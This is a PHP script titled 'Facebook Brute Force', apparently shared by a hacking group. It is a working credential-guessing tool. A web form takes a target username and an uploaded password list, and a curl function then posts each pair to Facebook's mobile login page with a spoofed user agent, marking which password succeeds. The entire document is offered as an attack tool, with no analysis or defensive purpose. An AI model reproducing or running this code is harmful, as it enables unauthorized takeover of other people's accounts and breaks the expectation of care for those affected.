Facebook Brute Force

1. <?php
2. // ============================= //
3. # Facebook Brute Force
4. # Created by Lyonc
5. # Garuda Security Hacker
6. # Use On Localhost
7. // ============================= //
8.  
9. error_reporting(0);
10.  
11. $user = $_POST['tguser'];
12.  
13. echo '<head>
14. <meta name="viewport" content="width=device-width, initial-scale=1.0">
15. <title>Facebook Brute Force</title>
16. </head>
17. <body>
18. <center>
19. ';
20.  
21. if(isset($_POST['startbf']) && !empty($user) && $_FILES['netfile']['size'] !== 0){
22. $textkskc = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123457890';
23. $panj = 15;
24. $txtl = strlen($textkskc)-1;
25. $uploadz = '';
26. for($i=1; $i<=$panj; $i++){
27. $uploadz .= $textkskc[rand(0, $txtl)];
28. }
29. if(move_uploaded_file($_FILES['netfile']['tmp_name'], $uploadz)){
30. $passlists = file_get_contents($uploadz);
31. unlink($uploadz);
32. }else{
33. $passlists = '';
34. }
35. $listspass = explode("\n", $passlists);
36. if(isset($_POST['brift'])){
37. foreach($listspass as $pass){
38. if(logfb(urlencode($user), urlencode($pass))){
39. echo '<font color="blue">'.htmlspecialchars($pass).'</font> <font color="brown">=></font> <font color="green">True</font><br/>'."\n";
40. break;
41. }else{
42. echo '<font color="blue">'.htmlspecialchars($pass).'</font> <font color="brown">=></font> <font color="red">False</font><br/>'."\n";
43. }
44. }
45. }else{
46. foreach($listspass as $pass){
47. if(logfb(urlencode($user), urlencode($pass))){
48. echo '<font color="blue">'.htmlspecialchars($pass).'</font> <font color="brown">=></font> <font color="green">True</font><br/>'."\n";
49. }else{
50. echo '<font color="blue">'.htmlspecialchars($pass).'</font> <font color="brown">=></font> <font color="red">False</font><br/>'."\n";
51. }
52. }
53. }
54. }else{
55. echo '<form method="post" enctype="multipart/form-data">
56. <b><font size="6" color="indigo">Facebook Brute Force</font></b><br/>
57. <font color="gray">Better Using Localhost</font><br/>
58. <b>Target Username</b><br/>
59. <input type="text" size="40" name="tguser" placeholder="Target Username" value="'.htmlspecialchars($user).'"><br/>
60. <b>Password Lists</b><br/>
61. <input type="file" name="netfile"><br/>
62. <input type="checkbox" name="brift" value="Break If True"><font color="blue">Break If True</font><br/>
63. <input type="submit" name="startbf" value="START">
64. </form>
65. ';
66. }
67.  
68. echo '</center>
69. </body>';
70.  
71. function logfb($login_email, $login_pass){
72. $cookielog = 'gsh_cookie';
73. $fp = fopen($cookielog, 'w');
74. fwrite($fp, '');
75. fclose($fp);
76. $ch = curl_init();
77. curl_setopt($ch, CURLOPT_URL, 'https://m.facebook.com/login.php');
78. curl_setopt($ch, CURLOPT_POSTFIELDS, 'email='.$login_email.'&pass='.$login_pass.'&login=Login');
79. curl_setopt($ch, CURLOPT_POST, 1);
80. curl_setopt($ch, CURLOPT_HEADER, 0);
81. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
82. curl_setopt($ch, CURLOPT_COOKIEJAR, $cookielog);
83. curl_setopt($ch, CURLOPT_COOKIEFILE, $cookielog);
84. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
85. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
86. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
87. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3');
88. curl_setopt($ch, CURLOPT_REFERER, 'http://m.facebook.com');
89. $page = curl_exec($ch) or die('<font color="red">Can\'t Connect to Host</font>');
90. if(eregi('<title>Facebook</title>', $page) || eregi('id="checkpointSubmitButton"', $page)){
91. return TRUE;
92. }else{
93. return FALSE;
94. }
95. }
96. ?>